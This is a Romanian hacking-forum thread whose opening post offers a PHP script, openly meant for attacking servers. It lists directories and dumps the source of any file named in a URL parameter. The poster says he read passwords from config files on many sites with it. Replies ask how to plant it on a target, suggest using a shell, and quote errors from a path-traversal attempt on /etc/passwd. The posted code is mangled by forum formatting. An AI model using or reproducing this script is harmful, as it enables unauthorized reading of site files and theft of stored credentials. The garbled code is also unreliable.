zbeng Posted October 18, 2006 Report Share Posted October 18, 2006 Acesta este un banal script in php cu care poti sa "hacuiesti" un ROOT de pe linux si/sau de windous , in alte cuvinte iti arata sursa fisierului php, si tot ce ai prin directorul ROOT de pe linuics, sau de pe uindous , eu am aflat parola din config la multe situri :@....Atentie fisierul trebuie sa fie pe acel server :@ altfel nu va merge <?// scripul e sub licenta GNU made by necenzuratecho "<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 //EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">n";echo "<html lang='en'>n";echo "<head>n";echo "<title></title>n";echo "<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>n";echo "</head>n";echo "<body>n";$mode = $_GET['mode'];$cat = $_GET['cat'];$dir = $_GET['dir'];if($mode==""){echo"<center>n";echo"<a href=?mode=list>Intra da ai GRIJA, nu stii ce se poate intampla dincolo de usa cu bolta </a>n";echo"</center>n";}elseif($mode=="steal"){if($cat==""){$cat="xs.php";}$size=filesize($cat);$file_size = round($size / 1024 * 100) / 100 . "Kb";echo"<table width=94% border=1 bordercolor=#AFC6DB cellspacing=0 bgcolor=#FFFFFF style=border-collapse: collapse cellpadding=0><tr><td>";$po=show_source($cat);echo "</td></tr></table></center>";echo "</body></html>";}elseif($mode=="list"){echo"<title>Afisare de directoare</title>";$base = substr($_SERVER['PATH_TRANSLATED'],0,strrpos($_SERVER['PATH_TRANSLATED'],'/'));if($dir==""){$dir="./";}$path = $dir;function after ($this, $inthat) { if (!is_bool(strpos($inthat, $this))) return substr($inthat, strpos($inthat,$this)+strlen($this)); }echo "<center>[B]$dir[/B]</font></center><table width=94% border=1 bordercolor=#AFC6DB cellspacing=0 bgcolor=#FFFFFF style=border-collapse: collapse cellpadding=0><tr><td>";$dir_handle = @opendir($path) or die("Nu se poate paci :(");while (false !== ($file = readdir($dir_handle))) {$link = "[url="?mode=steal&cat=$dir/$file><font"]$file</font>[/url]";$formato = after('.', $file);If($formato==".") {$link = "<a href=?mode=list&dir=$dir/$file>Directorul precedent</a>";}If($formato=="") {$link = "[url="?mode=list&dir=$dir/$file><font"]$file</font>[/url]";}echo "$link";}closedir($dir_handle);echo "</td></tr></table>";}?> bye necenzurat Quote Link to comment Share on other sites More sharing options...
Jeefo Posted November 12, 2007 Report Share Posted November 12, 2007 Pai si cum il bag pe acel site??? :?: Quote Link to comment Share on other sites More sharing options...
d3v1l Posted November 14, 2007 Report Share Posted November 14, 2007 Pai si cum il bag pe acel site??? :?: incerca un shell Quote Link to comment Share on other sites More sharing options...
em Posted December 3, 2007 Report Share Posted December 3, 2007 Scriptul are erori.Parse error: syntax error, unexpected T_ECHO in /storage0/home/eminemix.evonet.ro/www/gg.php on line 7Chiar dupa corectare nu merge cum spui tu (sau nu l-ai facut sa treaca de safe mode)SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access ../../../../../etc/passwd owned by uid 0 in /storage0/home/blabla on line 39 Quote Link to comment Share on other sites More sharing options...
Guest BanKai Posted December 3, 2007 Report Share Posted December 3, 2007 Scriptul are erori.Parse error: syntax error, unexpected T_ECHO in /storage0/home/eminemix.evonet.ro/www/gg.php on line 7Chiar dupa corectare nu merge cum spui tu (sau nu l-ai facut sa treaca de safe mode)SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access ../../../../../etc/passwd owned by uid 0 in /storage0/home/blabla on line 39serverele care ofera FREE HOSTING au o gramada de functii disabled si o gramada mai mare de fisiere restrictionate tocmai din cauza celor ca tine.("celor ca tine" = cei care incearca scripturi de hack pe servere free) Quote Link to comment Share on other sites More sharing options...